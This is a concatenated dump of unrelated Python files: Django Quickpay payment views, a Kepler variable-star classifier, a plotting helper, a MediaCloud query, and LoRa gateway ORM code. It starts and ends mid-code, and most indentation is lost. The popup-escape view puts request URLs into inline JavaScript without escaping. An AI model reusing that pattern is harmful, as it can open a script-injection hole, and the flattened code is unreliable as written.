def f_escape(request: HttpRequest) -> HttpResponse:
if request.GET.get('popup'):
logging.debug("cartridge_quickpay.views.escape_popup: Escaping")
url = request.path
get_args = request.GET.copy()
get_args.pop('popup')
if get_args:
url += '?' + get_args.urlencode()
res = '<html><head><script>var opener = window.opener; opener.document.location = "{}"; window.close(); opener.focus();</script></head></html>'.format(url)
return HttpResponse(res)
else:
logging.debug("cartridge_quickpay.views.escape_popup: NOT in popup")
return f(request)
f_escape.__name__ = f.__name__
return f_escape
@escape_frame
@escape_popup
def failed(request: HttpRequest):
"""Payment failed"""
logging.warning("payment_quickpay.views.failed(), GET args = {}".format(request.GET))
qp_failed_url = getattr(settings, 'QUICKPAY_FAILED_URL', '')
if qp_failed_url:
return HttpResponseRedirect(qp_failed_url)
else:
# Assumes the template is available...
return render(request, "shop/quickpay_failed.html")
@escape_frame
@escape_popup
def success(request: HttpRequest) -> HttpResponse:
"""Quickpay payment succeeded.
GET args:
id : int = ID of order
hash : str = signature hash of order. Raise
NB: Form not available (quickpay order handler)
NB: Only safe to call more than once if order_handler is
"""
order_id = request.GET.get('id')
if order_id:
order = Order.objects.get(pk=order_id)
else:
order = Order.objects.from_request(request) # Raises DoesNotExist if order not found
order_hash = sign_order(order)
logging.debug("\n ---- payment_quickpay.views.success()\n\norder = %s, sign arg = %s, check sign = %s"
% (order, request.GET.get('hash'), sign_order(order)))
logging.debug("data: {}".format(dict(request.GET)))
# Check hash.
if request.GET.get('hash') != order_hash:
logging.warn("cartridge_quickpay:success - hash doesn't match order")
return HttpResponseForbidden()
# Call order handler
order_handler(request, order_form=None, order=order)
response = redirect("shop_complete")
return response
try:
from cartridge_subscription.models import Subscription, SubscriptionPeriod
except ImportError:
Subscription = None
@csrf_exempt
@transaction.atomic
def callback(request: HttpRequest) -> HttpResponse:
"""Callback from Quickpay. Register payment status in case it wasn't registered already"""
def update_payment() -> Optional[QuickpayPayment]:
"""Update QuickPay payment from Quickpay result"""
# Refers order, data from outer scope
payment: Optional[QuickpayPayment] = QuickpayPayment.get_order_payment(order)
if payment is not None:
payment.update_from_res(data) # NB: qp.test_mode == data['test_mode']
payment.save()
return payment
data = json.loads(request.body.decode('utf-8'))
logging.debug("\n ---- payment_quickpay.views.callback() ----")
logging.debug("Got data {}\n".format(data))
# We may get several callbacks with states "new", "pending", or "processed"
# We're only interested in "processed" for payments and "active" for new subscriptions
qp_state = data.get('state', None)
if (qp_state in ('processed', 'active', 'rejected')
or not getattr(settings, 'QUICKPAY_AUTO_CAPTURE', False) and qp_state == 'pending'):
logging.debug("payment_quickpay.views.callback(): QP state is {}, processing".format(qp_state))
else:
logging.debug("payment_quickpay.views.callback(): QP state is {}, skipping".format(qp_state))
return HttpResponse("OK")
# Get the order
order_id_payment_id_string = data.get('order_id','')
logging.debug('order_id_payment_id_string: {}'.format(order_id_payment_id_string))
order_id = re.sub('_\d+', '', order_id_payment_id_string)
logging.debug('order_id: {}'.format(order_id))
try:
order = Order.objects.filter(pk=order_id).select_for_update()[0] # Lock order to prevent race condition
except IndexError:
# Order not found, ignore
logging.warning("payment_quickpay.views.callback(): order id {} not found, skipping".format(order_id))
return HttpResponse("OK")
# Check checksum. If we have multiple agreements, we need the order currency to get the right one
checksum = sign(request.body, get_private_key(order_currency(order)))
logging.debug("Request checksum = {}".format(request.META['HTTP_QUICKPAY_CHECKSUM_SHA256']))
logging.debug("Calculated checksum = {}".format(checksum))
if checksum != request.META['HTTP_QUICKPAY_CHECKSUM_SHA256']:
logging.error('Quickpay callback: checksum failed {}'.format(data))
return HttpResponseBadRequest()
logging.debug("payment_quickpay.views.callback(): order.status = {}".format(order.status))
if data['state'] == 'rejected':
update_payment()
elif data['type'] == 'Subscription' and Subscription is not None:
# Starting a NEW subscription. The Subscription is created in order_handler
logging.error("payment_quickpay.views.callback(): starting subscription, order {}".format(order.id))
# Capture the initial subscription payment
capture_subscription_order(order) # Starts async capture, next callback is 'accepted'
elif data['accepted']:
# Normal or subscription payment
# If autocapture, the payment will have been captured.
# If not autocapture, the payment will have been reserved only and must be captured later.
# -- The order can be considered paid (reserved or captured) if and only if we get here.
# -- An order is paid if and only if it has a transaction_id
logging.info("payment_quickpay.views.callback(): accepted payment, order {}".format(order.id))
payment = update_payment()
order.transaction_id = data['id']
logging.debug("payment_quickpay.views.callback(): calling order_handler, qp subscription = {}"
.format(data.get('subscription_id', '-')))
order_handler(request=None, order_form=None, order=order, payment=payment)
logging.debug("payment_quickpay.views.callback(): final order.status: {}".format(order.status))
return HttpResponse("OK")
| 2 | 2 |
python/archive/writedata.py | d-giles/KeplerML | 0 | 12796801 | # reads in both both .sav files: the long-cadence data and the variable supplement
# removes all objects that lack data like effective temperatures
# writes the dataset.npy and logdata.npy files
# also building the training and test sets and runs a Gaussian Naive Bayes classifier
import numpy as np
import pyfits as pf
import itertools
from scipy.io.idl import readsav
from scipy.spatial import distance
import pylab as pl
from sklearn import metrics
from sklearn.ensemble import RandomForestClassifier
from sklearn.mixture import GMM
from astroML.datasets import fetch_sdss_specgals
from astroML.decorators import pickle_results
from sklearn import naive_bayes
#from __future__ import print_function
s = readsav('../data/grndsts9_vars.sav')
s2 = readsav('../data/ts_stats.sav')
#print int(s2.kepid[0]), s2.kepmag[0], s2.teff[0], s2.logg[0], s2.radius[0], s2.range[0], s2.rmsmdv[0], s2.mdv3[0], s2.mdv6[0], s2.mdv12[0], s2.mdv24[0], s2.mdv48[0], s2.mdv4d[0], s2.mdv8d[0], s2.npk[0], s2.maxpkht[0], s2.maxper[0], s2.maxflx[0], s2.sndht[0], s2.sndper[0], s2.sndflx[0], s2.np3d[0], s2.np9d[0], s2.nsigpks[0], s2.rms4[0], s2.cdpp3[0], s2.cdpp6[0], s2.cdpp12[0], s2.pdcvar[0], s2.crowd[0]
print len(s.teff)
n1 = len([x for x in s.teff if x>0])
print n1
for i in range(0,n1):
if s.teff[i]>0 and s.cdpp3[i]==0: n1 = n1-1
print n1
n1 = 151797
n2 = n1 + len([x for x in s2.teff if x>0])
print n2
for i in range(n1,n2):
if s2.teff[i-n1]>0 and s2.cdpp3[i-n1]==0: n2 = n2-1
print n2
dataset = np.empty([n2,30])
i=0
j=0
while i<n1:
if s.teff[j]>0 and s.cdpp3[j]!=0:
dataset[i,0] = s.kepid[j]
dataset[i,1] = s.kepmag[j]
dataset[i,2] = s.teff[j]
dataset[i,3] = s.logg[j]
dataset[i,4] = s.radius[j]
dataset[i,5] = s.range[j]
dataset[i,6] = s.rmsmdv[j]
dataset[i,7] = s.mdv3[j]
dataset[i,8] = s.mdv6[j]
dataset[i,9] = s.mdv12[j]
dataset[i,10] = s.mdv24[j]
dataset[i,11] = s.mdv48[j]
dataset[i,12] = s.mdv4d[j]
dataset[i,13] = s.mdv8d[j]
dataset[i,14] = s.npk[j]
dataset[i,15] = s.maxpkht[j]
dataset[i,16] = s.maxper[j]
dataset[i,17] = s.maxflx[j]
dataset[i,18] = s.sndht[j]
dataset[i,19] = s.sndper[j]
dataset[i,20] = s.sndflx[j]
dataset[i,21] = s.np3d[j]
dataset[i,22] = s.np9d[j]
dataset[i,23] = s.nsigpks[j]
dataset[i,24] = s.rms4[j]
dataset[i,25] = s.cdpp3[j]
dataset[i,26] = s.cdpp6[j]
dataset[i,27] = s.cdpp12[j]
dataset[i,28] = s.pdcvar[j]
dataset[i,29] = s.crowd[j]
i=i+1
j=j+1
if i>152780:
print i,j
print s.kepid[j]
print dataset[i]
print dataset[895]
i=n1
j=0
while i<n2:
if s2.teff[j]>0 and s2.cdpp3[j]!=0:
dataset[i,0] = s2.kepid[j]
dataset[i,1] = s2.kepmag[j]
dataset[i,2] = s2.teff[j]
dataset[i,3] = s2.logg[j]
dataset[i,4] = s2.radius[j]
dataset[i,5] = s2.range[j]
dataset[i,6] = s2.rmsmdv[j]
dataset[i,7] = s2.mdv3[j]
dataset[i,8] = s2.mdv6[j]
dataset[i,9] = s2.mdv12[j]
dataset[i,10] = s2.mdv24[j]
dataset[i,11] = s2.mdv48[j]
dataset[i,12] = s2.mdv4d[j]
dataset[i,13] = s2.mdv8d[j]
dataset[i,14] = s2.npk[j]
dataset[i,15] = s2.maxpkht[j]
dataset[i,16] = s2.maxper[j]
dataset[i,17] = s2.maxflx[j]
dataset[i,18] = s2.sndht[j]
dataset[i,19] = s2.sndper[j]
dataset[i,20] = s2.sndflx[j]
dataset[i,21] = s2.np3d[j]
dataset[i,22] = s2.np9d[j]
dataset[i,23] = s2.nsigpks[j]
dataset[i,24] = s2.rms4[j]
dataset[i,25] = s2.cdpp3[j]
dataset[i,26] = s2.cdpp6[j]
dataset[i,27] = s2.cdpp12[j]
dataset[i,28] = s2.pdcvar[j]
dataset[i,29] = s2.crowd[j]
i=i+1
j=j+1
q=8
logdata = np.log10(dataset)
testdata = np.empty([n2,q])
plotdata = np.empty([n2,q])
plotdata[:,0] = dataset[:,2] #teff
plotdata[:,1] = dataset[:,3] #logg
plotdata[:,2] = logdata[:,15] #maxpkht
plotdata[:,3] = logdata[:,18] #sndht
plotdata[:,4] = logdata[:,16] #maxper
plotdata[:,5] = logdata[:,19] #sndper
plotdata[:,6] = logdata[:,5] #range
plotdata[:,7] = logdata[:,24] #rms4
np.save('../data/dataset',dataset)
np.save('../data/logdata',logdata)
#s.range = s.range/s.totf
j=0
for i in [2,3,15,18,16,19,5,24]:
mean = np.mean(logdata[:,i])
std = np.mean(logdata[:,i])
testdata[:,j] = (logdata[:,i]-mean)/std
j=j+1
teff = dataset[:,2]
rrlyrae = [5520878, 3733346, 5299596, 6070714, 6100702, 6763132, 6936115, 7176080]
rtest = [7742534, 7988343, 8344381, 9508655, 9591503, 9947026, 10789273, 11802860]
instrip = [2571868, 2987660, 3629496, 5356349, 5437206, 6668729, 7304385, 7974841, 8018827, 8324268]
itest = [8351193, 8489712, 8915335, 9291618, 9351622, 10537907, 10974032, 11572666, 11874676, 12153021]
detached = [1026032, 1026957, 1433962, 1571511, 1725193, 1996679, 2010607, 2162635, 2162994, 2305372, 2305543, 2306740]
dtest = [2308957, 2309587, 2309719, 2437452, 2438070, 2440757, 2442084, 2445134, 2447893, 2556127, 2557430, 2576692]
semidet = [4947528, 4949770, 5077994, 5120793, 5211385, 5215999, 5218441, 5374999, 5471619, 5774375, 5785586, 5792093, 5809827]
sdtest = [5823121, 6283224, 6302051, 6353203, 6432059, 6606653, 6669809, 6692340, 6836140, 6852488, 6865626, 6962901, 7031714]
overcontact = [7821450, 7830460, 7835348, 7839027, 7871200, 7877062, 7878402, 7879404, 7881722, 7889628, 7950962, 7973882, 7977261]
octest = [8004839, 8035743, 8039225, 8053107, 8108785, 8111387, 8122124, 8143757, 8177958, 8190491, 8190613, 8192840, 8241252]
ellipsoid = [9848190, 9898401, 9909497, 9948201, 10028352, 10030943, 10032392, 10123627, 10135584, 10148799, 10155563, 10285770, 10288502, 10291683, 10351735, 10417135]
eltest = [10481912, 10600319, 10619506, 10855535, 11135978, 11336707, 11572643, 11714337, 11722816, 11751847, 11825204, 11875706, 12055421, 12059158, 12121738, 12166770]
uncertain = [9237533, 9347868, 9347955, 9456920, 9469350, 9480516, 9532591, 9596355, 9655187, 9713664, 9716456, 9724080]
utest = [9724220, 9832227, 9835416, 9874575, 9964422, 10086746, 10264744, 10350225, 10388897, 10556068, 10684673, 10799558]
#candidate = [1027438, 1161345, 1431122, 1432214, 1432789, 1717722, 1718189, 1718958, 1721157, 1724719, 1725016, 1849702, 1865042, 1871056, 1872821, 1995519, 1996180, 2141783, 2142522, 2161536, 2162635, 2164169, 2165002, 2302548, 2303903, 2304320, 2306756, 2307199, 2307415, 2309719, 2438264, 2438513, 2439243, 2441495, 2442448, 2444412, 2449431]
#falsepos = [892772, 1026957, 1433962, 1571511, 1722276, 1996679, 2157247, 2166206, 2309585, 2438070, 2440757, 2441151, 2441728, 2445129, 2445154, 2446113, 2452450]
num = 100
sunlike = [0]*num
kdwarf = [0]*num
giant = [0]*num
other = [0]*num
stest = [0]*num
ktest = [0]*num
gtest = [0]*num
otest = [0]*num
sun=0
kdw=0
gnt=0
oth=0
j=0
while 1:
if 3500<=teff[j]<=5100 and (s.logg[j]>=4.2 or s.logg[j]>=(2.2+0.0005*teff[j])):
if kdw<100: kdwarf[kdw] = dataset[j,0]
elif kdw<200: ktest[kdw-100] = dataset[j,0]
kdw = kdw+1
elif 5600<=teff[j]<=5900:
if sun<100: sunlike[sun] = dataset[j,0]
elif sun<200: stest[sun-100] = dataset[j,0]
sun = sun+1
elif 0<s.logg[j]<=(6.0-0.0004*teff[j]) and s.logg[j]<=4.0 and teff[j]>0:
if gnt<100: giant[gnt] = dataset[j,0]
elif gnt<200: gtest[gnt-100] = dataset[j,0]
gnt = gnt+1
elif teff[j]>0:
if oth<100: other[oth] = dataset[j,0]
elif oth<200: otest[oth-100] = dataset[j,0]
oth = oth+1
if kdw>=200 and sun>=200 and gnt>=200 and oth>=200: break
j = j+1
#p = len(rrlyrae + instrip + detached + semidet + overcontact + ellipsoid + uncertain + sunlike + kdwarf + giant + other)
#kidlist = [other, sunlike, kdwarf, giant, rrlyrae, instrip, detached, semidet, overcontact, ellipsoid, uncertain]
#testlist = [otest, stest, ktest, gtest, rtest, itest, dtest, sdtest, octest, eltest, utest]
p = len(rrlyrae + instrip + detached + semidet + overcontact + ellipsoid + uncertain)
kidlist = [rrlyrae, instrip, detached, semidet, overcontact, ellipsoid, uncertain]
testlist = [rtest, itest, dtest, sdtest, octest, eltest, utest]
col=np.empty([p],dtype='S10')
training = np.empty([p,q])
pd = np.empty([p,q])
h = 0
for i in kidlist:
for j in i:
#print h, j
temp = testdata[np.where(dataset[:,0]==j)[0][0]]
temp2 = plotdata[np.where(dataset[:,0]==j)[0][0]]
for k in range(0,q):
training[h,k] = temp[k]
for k in range(0,q):
pd[h,k] = temp2[k]
if i==instrip: col[h] = 'blue'
elif i==detached: col[h] = 'cyan'
elif i==sunlike: col[h] = 'white'
elif i==kdwarf: col[h] = 'white'
elif i==giant: col[h] = 'white'
elif i==other: col[h] = 'white'
elif i==rrlyrae: col[h] = 'magenta'
elif i==semidet: col[h] = 'green'
elif i==overcontact: col[h] = 'yellow'
elif i==ellipsoid: col[h] = 'orange'
elif i==uncertain: col[h] = 'red'
h = h+1
h=0
sampletest = np.empty([p,q])
pdtest = np.empty([p,q])
coltest=np.empty([p],dtype='S10')
for i in testlist:
for j in i:
#print h, j
temp = testdata[np.where(dataset[:,0]==j)[0][0]]
temp2 = plotdata[np.where(dataset[:,0]==j)[0][0]]
for k in range(0,q):
sampletest[h,k] = temp[k]
for k in range(0,q):
pdtest[h,k] = temp2[k]
if i==itest: coltest[h] = 'blue'
elif i==dtest: coltest[h] = 'cyan'
elif i==stest: coltest[h] = 'yellow'
elif i==ktest: coltest[h] = 'orange'
elif i==gtest: coltest[h] = 'red'
elif i==otest: coltest[h] = 'white'
elif i==rtest: coltest[h] = 'magenta'
elif i==sdtest: coltest[h] = 'green'
elif i==octest: coltest[h] = 'yellow'
elif i==eltest: coltest[h] = 'orange'
elif i==utest: coltest[h] = 'red'
h = h+1
#q = len([x for x in testdata if x[0]>0])
'''
q=5000
i=0
j=0
sampletest = np.empty([q,n])
pdtest = np.empty([q,m])
#col=np.empty([q],dtype='S10')
while i<len(sampletest):
if testdata[j,0] > -10 and j>10000:
sampletest[i] = testdata[j]
pdtest[i] = plotdata[j]
i=i+1
j=j+1
'''
sample = training
'''
sample2 = np.empty([len(sample),q])
for i in range(0,q):
temp = sample[:,i].argsort()
sample2[:,i] = np.arange(len(sample[:,i]))[temp.argsort()]
sample2 = sample2/len(sample)
'''
print np.shape(sample)
fig = pl.figure(1)
pl.clf()
'''
colors = itertools.cycle('bgrcmybgrcmybgrcmybgrcmy')
for k, col in zip(set(labels), colors):
for index in class_members:
x = testdata[:,index]
pl.plot(x[0], x[1], 'o', markerfacecolor=col,
markeredgecolor=col, markersize=1)
pl.plot(0,0)
pl.show()
i=1
while i<=1:
clf = KMeans(n_clusters=i, max_iter=1, random_state=0)
clf.fit(sample)
'''
X_train = training
y_train = col
X_test = sampletest
y_test = coltest
gnb = naive_bayes.GaussianNB()
gnb.fit(X_train, y_train)
y_pred = gnb.predict(X_test)
n=0
for i in range(0,len(y_pred)):
if y_pred[i] != y_test[i]:
#print i, y_pred[i], y_test[i]
n = n+1
print n, 1.0 - n*1.0/len(y_test)
'''
@pickle_results('forest.pkl')
def compute_forest(depth):
rms_test = np.zeros(len(depth))
rms_train = np.zeros(len(depth))
i_best = 0
clf = RandomForestClassifier(n_estimators=1, max_depth=5,
min_samples_split=1, random_state=0)
stuff = clf.fit(rms_train)
stuff = clf.apply(rms_test)
print stuff
compute_forest([0,1,2,3,4])
for i, d in enumerate(depth):
clf = RandomForestClassifier(n_estimators=10, max_depth=d,
min_samples_split=1, random_state=0)
stuff = cross_val_score(clf, rms_test, rms_train)
print stuff
'''
'''
def onpick(event):
ind=event.ind
s1 = ax1.scatter(X[ind,0],X[ind,1],c=col[ind],lw=1,s=36)
s2 = ax2.scatter(pd[ind,0],pd[ind,1],c=col[ind],lw=1,s=36)
s3 = ax3.scatter(pd[ind,4],pd[ind,5],c=col[ind],lw=1,s=36)
s4 = ax4.scatter(pd[ind,6],pd[ind,7],c=col[ind],lw=1,s=36)
pl.ion()
pl.draw()
s1.set_visible(False)
s2.set_visible(False)
s3.set_visible(False)
s4.set_visible(False)
'''
ax1 = pl.subplot(221,axisbg='black')
ax1.scatter(pdtest[:,0],pdtest[:,1],c=y_pred,lw=0,s=7,picker=True)
#ax1.scatter(sample[:,0],sample[:,1],c=col,lw=0,s=7,picker=True)
#fig.canvas.mpl_connect('pick_event',onpick)
#pl.xlim(2000,12000)
#pl.ylim(0,6)
pl.xlabel('T_eff')
pl.ylabel('log(g)')
ax2 = pl.subplot(222,axisbg='black')
ax2.scatter(pdtest[:,2],pdtest[:,3],c=y_pred,lw=0,s=7,picker=True)
#ax2.scatter(sample[:,2],sample[:,3],c=col,lw=0,s=7,picker=True)
#fig.canvas.mpl_connect('pick_event',onpick)
#pl.xlim(-1,4)
#pl.ylim(-1,3.5)
pl.xlabel('log-first peak height')
pl.ylabel('log-second peak height')
ax3 = pl.subplot(223,axisbg='black')
ax3.scatter(pdtest[:,4],pdtest[:,5],c=y_pred,lw=0,s=7,picker=True)
#ax3.scatter(sample[:,4],sample[:,5],c=col,lw=0,s=7,picker=True)
#fig.canvas.mpl_connect('pick_event',onpick)
#pl.xlim(-1.5,2.5)
#pl.ylim(-1.5,2.5)
pl.xlabel('log-first peak period (d)')
pl.ylabel('log-second peak period (d)')
ax4 = pl.subplot(224,axisbg='black')
ax4.scatter(pdtest[:,6],pdtest[:,7],c=y_pred,lw=0,s=7,picker=True)
#ax4.scatter(sample[:,6],sample[:,7],c=col,lw=0,s=7,picker=True)
#fig.canvas.mpl_connect('pick_event',onpick)
#pl.xlim(-4,2)
#pl.ylim(-3,3)
pl.xlabel('log-amplitude')
pl.ylabel('RMS deviation')
'''
ax1 = pl.subplot(221, axisbg='black')
ax1.scatter(X[:,0],X[:,1],c=col,s=7,lw=0,picker=True)
fig.canvas.mpl_connect('pick_event',onpick)
pl.xlabel('component 1')
pl.ylabel('component 2')
ax2 = pl.subplot(223, sharex=ax1, axisbg='black')
ax2.scatter(X[:,0],X[:,2],c=col,s=7,lw=0)
pl.xlabel('component 1')
pl.ylabel('component 3')
ax3 = pl.subplot(224, sharey=ax2, axisbg='black')
ax3.scatter(X[:,1],X[:,2],c=col,s=7,lw=0)
pl.xlabel('component 2')
'''
pl.show()
| 2.140625 | 2 |
neural_network/drawbox.py | PurdueMINDS/SAGA | 1 | 12796802 | # Copyright 2018 <NAME>, <NAME>, <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Draw plots"""
import os
import math
import numpy as np
import pandas as pd
# forbid GUI
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
# /**
# * Multi Plots Container
# */
class EqualGridFigure(object):
"""Distribute all axes with similar attributes with grids of same size
It can have multi axes in one figure, but all axes will have the same height and width,
so they should describe data of similar attribute.
"""
def __init__(self, num_rows, num_cols, ax_height, ax_width, title=None, font_size=None):
super(EqualGridFigure, self).__init__()
# global settings
if not font_size is None: mpl.rcParams.update({'font.size': font_size})
# figure size
self.num_rows = num_rows
self.num_cols = num_cols
self.fig, self.axes = plt.subplots(
num_rows, num_cols,
figsize=(ax_width * num_cols, max(ax_height * num_rows, 20)))
# figure title
if not title is None:
if font_size is None: self.fig.suptitle(title)
else: self.fig.suptitle(title, fontsize=font_size * 2)
# buffer for each plot
self.cnt = [[0 for cl in range(self.num_cols)] for rw in range(self.num_rows)]
def __getitem__(self, idx_pair):
assert len(idx_pair) == 2
row_id, col_id = idx_pair
if self.num_rows == 1:
if self.num_cols == 1: return self.axes
else: return self.axes[col_id]
else:
if self.num_cols == 1: return self.axes[row_id]
else: return self.axes[row_id][col_id]
def close(self):
plt.close(self.fig)
def subtitle(self, row_id, col_id, subtitle,
x_label=None, y_label=None):
"""Set ax title
Args
----
row_id, col_id : int
indices to specify the exact ax
subtitle : str
title for specified ax
x_label : str
title for x-axis
y_label : str
title for y-axis
"""
ax = self[row_id, col_id]
ax.set_title(subtitle)
if x_label is not None: ax.set_xlabel(x_label)
if y_label is not None: ax.set_ylabel(y_label)
def save_fig(self, path, close=True):
"""Save figure of all axes
Args
----
path : str
path to save the figure
close : bool
if close figure after saving
"""
dirname = os.path.dirname(path)
_, extname = os.path.splitext(path)
extname = extname[1:]
if not os.path.isdir(dirname): os.makedirs(dirname)
self.fig.savefig(path, format=extname, dpi='figure')
if close: self.close()
def lineplot(self, row_id, col_id, x_data, y_data,
label=None, color=None, alpha=None, marker=None, linestyle=None,
vmin=None, vmax=None):
"""Line plot
Args
----
row_id, col_id : int
indices to specify the exact ax
x_data, y_data : <1D-array-like>
data for x-axis and y-axis
label : str
label of data
color : str
specify color to plot
marker : str
point style to plot
linestyle : str
line style to plot
vmin : float
min value of data to plot
vmax : float
max value of data to plot
Draw a line in ax (row_id, col_id).
It can draw a line on ax which already has something.
"""
ax = self[row_id, col_id]
# settings
label = label or 'Line {}'.format(self.cnt[row_id][col_id])
color = color or 'C{}'.format(self.cnt[row_id][col_id])
alpha = alpha or 1
marker = marker or ','
linestyle = linestyle or '-'
ax.plot(x_data, y_data, label=label, \
color=color, alpha=alpha, \
marker=marker, \
linewidth=6.0, linestyle=linestyle)
if vmin: ax.set_ylim(ymin=vmin)
if vmax: ax.set_ylim(ymax=vmax)
self.cnt[row_id][col_id] += 1
def legend(self):
"""Place legend"""
for rw in range(self.num_rows):
for cl in range(self.num_cols):
ax = self[rw, cl]
if self.cnt[rw][cl] > 1: ax.legend()
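

# A minimal usage sketch (not part of the original module; the data and output path are made up):
if __name__ == "__main__":
    demo = EqualGridFigure(num_rows=1, num_cols=2, ax_height=10, ax_width=10,
                           title="Demo figure", font_size=12)
    demo.subtitle(0, 0, "Squares", x_label="x", y_label="y")
    demo.lineplot(0, 0, [0, 1, 2, 3], [0, 1, 4, 9], label="x^2")
    demo.lineplot(0, 0, [0, 1, 2, 3], [0, 1, 2, 3], label="x")
    demo.subtitle(0, 1, "Identity")
    demo.lineplot(0, 1, [0, 1, 2, 3], [0, 1, 2, 3])
    demo.legend()
    demo.save_fig("plots/demo.png")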
| 2.796875 | 3 |
plugins/tasks_plugin/__init__.py | shivammmmm/querybook | 1,144 | 12796803 | # from tasks.delete_mysql_cache import delete_mysql_cache
# delete_mysql_cache
| 1.046875 | 1 |
HW1/election_count.py | profrichto/handson | 0 | 12796804 | import mediacloud, datetime
#Default key: The variable 'key' must be edited according to the specific mediacloud user
key = '00'
mc = mediacloud.api.MediaCloud(key)
#Comparison of number of stories written about 'Trump' and 'Clinton' in September 2016
res = mc.sentenceCount('Trump', solr_filter=[mc.publish_date_query( datetime.date( 2016, 9, 1), datetime.date( 2016, 10, 1) ), 'tags_id_media:1' ])
res2 = mc.sentenceCount('Clinton', solr_filter=[mc.publish_date_query( datetime.date( 2016, 9, 1), datetime.date( 2016, 10, 1) ), 'tags_id_media:1' ])
person = 'Trump' if res['count'] > res2['count'] else 'Clinton'
print 'The US Mainstream Media sources talked more about', person, 'in September 2016.'
| 2.59375 | 3 |
db/tables/Base.py | Wanket/RnD-py | 0 | 12796805 | <gh_stars>0
from sqlalchemy.orm import declarative_base
class Base(declarative_base()):
__abstract__ = True
| 1.664063 | 2 |
arjuna/interact/http/model/internal/repr/response.py | bhargavkumar-65/arjuna | 13 | 12796806 | <filename>arjuna/interact/http/model/internal/repr/response.py
# This file is a part of Arjuna
# Copyright 2015-2021 <NAME>
# Website: www.RahulVerma.net
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from arjuna.tpi.helper.arjtype import CIStringDict
from arjuna.interact.http.model.internal.processor.response import HttpExpectedResProcessor, HttpUnexpectedResProcessor
class HttpResponseYamlRepr:
def __init__(self, action, resp_yaml):
self.__xproc = None
self.__unexproc = None
if "unexpected" in resp_yaml:
self.__unexproc = HttpUnexpectedResProcessor(action._endpoint.service, CIStringDict(resp_yaml["unexpected"]))
del resp_yaml["unexpected"]
self.__xproc = HttpExpectedResProcessor(action._endpoint.service, CIStringDict(resp_yaml))
def validate(self, response):
if self.__xproc:
self.__xproc.validate(response)
if self.__unexproc:
self.__unexproc.validate(response)
| 1.914063 | 2 |
UServer/userver/object/gateway.py | soybean217/lora-python | 0 | 12796807 | from database.db0 import db0, ConstDB
from database.db3 import db3, ConstDB3
from utils.errors import KeyDuplicateError, ReadOnlyDeny
from utils.utils import eui_64_to_48, eui_48_to_64
from binascii import hexlify
from enum import Enum
import enum
from userver.frequency_plan import FrequencyPlan
from userver.object.asserts import Assertions
from userver.user.models import User
from sqlalchemy import Column, String, BINARY
from sqlalchemy import orm, ForeignKey
from database.db_sql import db_sql
import eviltransform
class Platform(Enum):
rpi = 'Raspberry Pi'
rpi3 = 'Raspberry Pi 3'
linklabs = 'LinkLabs'
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Platform), '%r is not a valid Platform' % value
class Model(Enum):
imst = 'IMST'
linklabs = 'LinkLabs'
menthink = 'MenThink'
risinghf = 'RisingHF'
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Model), '%r is not a valid Model' % value
class Field:
id = 'id'
mac_addr = 'mac_addr'
name = 'name'
platform = 'platform'
model = 'model'
freq_plan = 'freq_plan'
public = 'public'
disable = 'disable'
time = 'time'
lng = 'lng'
lat = 'lat'
alt = 'alt'
location = 'location'
user_id = 'user_id'
restart = 'restart'
class Location:
_assert_switcher = {Field.lng: Assertions.a_float,
Field.lat: Assertions.a_float,
Field.alt: Assertions.a_int, }
def __setattr__(self, key, value):
self._assert_switcher[key](value)
self.__dict__[key] = value
def __init__(self, lng, lat, alt):
self.lng = lng
self.lat = lat
self.alt = alt
self.switch_wgs2gcj()
def __str__(self):
return '%s,%s,%s' % (self.lng, self.lat, self.alt)
def obj_to_dict(self):
info = {}
for key, value in self.__dict__.items():
if key in (Field.lng, Field.lat, Field.alt):
info[key] = value
return info
def switch_wgs2gcj(self):
self.lat, self.lng = eviltransform.wgs2gcj(self.lat, self.lng)
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Location), '%r is not a valid Location' % value
class objects:
@staticmethod
def str_to_obj(string):
string = string.split(',')
try:
return Location(float(string[0]), float(string[1]), int(string[2]))
except Exception as error:
raise error
class Gateway(db_sql.Model):
redis_fields = (Field.user_id, Field.platform, Field.model, Field.freq_plan, Field.public, Field.disable, Field.location)
__vars_can_write = (Field.platform, Field.model, Field.freq_plan, Field.public, Field.disable, Field.name, Field.location)
_assert_switcher = {
Field.user_id: Assertions.a_not_negative_int,
Field.id: Assertions.a_eui_64,
Field.mac_addr: Assertions.a_eui_48,
Field.name: Assertions.a_str,
Field.platform: Platform.assert_isinstanceof,
Field.freq_plan: FrequencyPlan.assert_isinstanceof,
Field.model: Model.assert_isinstanceof,
Field.public: Assertions.a_bool,
Field.disable: Assertions.a_bool,
Field.restart: Assertions.a_bool,
Field.location: Location.assert_isinstanceof,
Field.time: Assertions.a_int,
}
__table_args__ = {'schema': 'nwkserver'}
__tablename__ = 'gateway'
id = Column(BINARY(8), primary_key=True)
name = Column(String(50))
user_id = db_sql.Column(db_sql.Integer(), ForeignKey(User.id, ondelete='CASCADE', onupdate='CASCADE'), nullable=False)
@orm.reconstructor
def init_on_load(self):
self.mac_addr = eui_64_to_48(self.id)
info = db0.hgetall(ConstDB.gateway + hexlify(self.id).decode())
self.freq_plan = FrequencyPlan(info[b'freq_plan'].decode())
self.public = bool(int(info[b'public']))
self.disable = bool(int(info[b'disable']))
self.platform = Platform[info[b'platform'].decode()]
self.model = Model[info[b'model'].decode()]
location = info.get(b'location')
if location is not None:
self.location = Location.objects.str_to_obj(location.decode())
else:
self.location = Location(0.0, 0.0, 0)
time = db3.get(ConstDB3.T_GATEWAY + hexlify(self.id).decode())
if time is not None:
self.time = int(time)
def __setattr__(self, key, value):
try:
attr = getattr(self, key)
